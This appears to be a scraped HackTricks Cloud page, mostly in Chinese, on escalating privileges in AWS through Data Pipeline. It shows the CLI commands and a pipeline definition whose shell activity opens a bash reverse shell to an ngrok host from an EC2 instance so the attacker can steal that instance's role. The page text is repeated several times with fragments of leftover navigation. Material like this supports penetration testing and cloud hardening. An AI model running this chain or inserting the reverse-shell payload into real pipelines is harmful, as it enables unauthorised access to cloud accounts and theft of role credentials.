AWS - Datapipeline Privesc

学习和实践 AWS 黑客技术：HackTricks 培训 AWS 红队专家 (ARTE) 学习和实践 GCP 黑客技术：HackTricks 培训 GCP 红队专家 (GRTE)

支持 HackTricks

查看 订阅计划!
加入 💬 Discord 群组 或 telegram 群组 或在 Twitter 🐦 @hacktricks_live** 上关注我们。**
通过向 HackTricks 和 HackTricks Cloud github 仓库提交 PR 分享黑客技巧。

datapipeline

有关 datapipeline 的更多信息，请查看：

AWS - DataPipeline, CodePipeline & CodeCommit Enum

`iam:PassRole`, `datapipeline:CreatePipeline`, `datapipeline:PutPipelineDefinition`, `datapipeline:ActivatePipeline`

具有这些 权限的用户可以通过创建数据管道来提升权限，以使用 分配角色的权限 执行任意命令：

aws datapipeline create-pipeline --name my_pipeline --unique-id unique_string

在管道创建后，攻击者更新其定义以指示特定的操作或资源创建：

{
"objects": [
{
"id" : "CreateDirectory",
"type" : "ShellCommandActivity",
"command" : "bash -c 'bash -i >& /dev/tcp/8.tcp.ngrok.io/13605 0>&1'",
"runsOn" : {"ref": "instance"}
},
{
"id": "Default",
"scheduleType": "ondemand",
"failureAndRerunMode": "CASCADE",
"name": "Default",
"role": "assumable_datapipeline",
"resourceRole": "assumable_datapipeline"
},
{
"id" : "instance",
"name" : "instance",
"type" : "Ec2Resource",
"actionOnTaskFailure" : "terminate",
"actionOnResourceFailure" : "retryAll",
"maximumRetries" : "1",
"instanceType" : "t2.micro",
"securityGroups" : ["default"],
"role" : "assumable_datapipeline",
"resourceRole" : "assumable_ec2_profile_instance"
}]
}

请注意，第14、15和27行中的角色需要是可由datapipeline.amazonaws.com假设的角色，而第28行中的角色需要是可由ec2.amazonaws.com假设的角色，并具有EC2配置文件实例。

此外，EC2实例将仅能访问可由EC2实例假设的角色（因此您只能窃取那个角色）。

aws datapipeline put-pipeline-definition --pipeline-id <pipeline-id> \
--pipeline-definition file:///pipeline/definition.json

The 管道定义文件，由攻击者精心制作，包含执行命令或通过 AWS API 创建资源的指令，利用数据管道的角色权限，可能获得额外的特权。

潜在影响： 直接提升到指定的 ec2 服务角色。

参考文献

https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

PreviousAWS - Cognito Privesc NextAWS - Directory Services Privesc

Last updated 3 days ago

datapipeline

有关 datapipeline 的更多信息，请查看：

AWS - DataPipeline, CodePipeline & CodeCommit Enum

iam:PassRole, datapipeline:CreatePipeline, datapipeline:PutPipelineDefinition, datapipeline:ActivatePipeline

具有这些 权限的用户可以通过创建数据管道来提升权限，以使用 分配角色的权限 执行任意命令：

aws datapipeline create-pipeline --name my_pipeline --unique-id unique_string

在管道创建后，攻击者更新其定义以指示特定的操作或资源创建：

{
"objects": [
{
"id" : "CreateDirectory",
"type" : "ShellCommandActivity",
"command" : "bash -c 'bash -i >& /dev/tcp/8.tcp.ngrok.io/13605 0>&1'",
"runsOn" : {"ref": "instance"}
},
{
"id": "Default",
"scheduleType": "ondemand",
"failureAndRerunMode": "CASCADE",
"name": "Default",
"role": "assumable_datapipeline",
"resourceRole": "assumable_datapipeline"
},
{
"id" : "instance",
"name" : "instance",
"type" : "Ec2Resource",
"actionOnTaskFailure" : "terminate",
"actionOnResourceFailure" : "retryAll",
"maximumRetries" : "1",
"instanceType" : "t2.micro",
"securityGroups" : ["default"],
"role" : "assumable_datapipeline",
"resourceRole" : "assumable_ec2_profile_instance"
}]
}

此外，EC2实例将仅能访问可由EC2实例假设的角色（因此您只能窃取那个角色）。

aws datapipeline put-pipeline-definition --pipeline-id <pipeline-id> \
--pipeline-definition file:///pipeline/definition.json

The 管道定义文件，由攻击者精心制作，包含执行命令或通过 AWS API 创建资源的指令，利用数据管道的角色权限，可能获得额外的特权。

潜在影响： 直接提升到指定的 ec2 服务角色。

datapipeline

iam:PassRole, datapipeline:CreatePipeline, datapipeline:PutPipelineDefinition, datapipeline:ActivatePipeline

参考文献

datapipeline

iam:PassRole, datapipeline:CreatePipeline, datapipeline:PutPipelineDefinition, datapipeline:ActivatePipeline

参考文献

`iam:PassRole`, `datapipeline:CreatePipeline`, `datapipeline:PutPipelineDefinition`, `datapipeline:ActivatePipeline`

`iam:PassRole`, `datapipeline:CreatePipeline`, `datapipeline:PutPipelineDefinition`, `datapipeline:ActivatePipeline`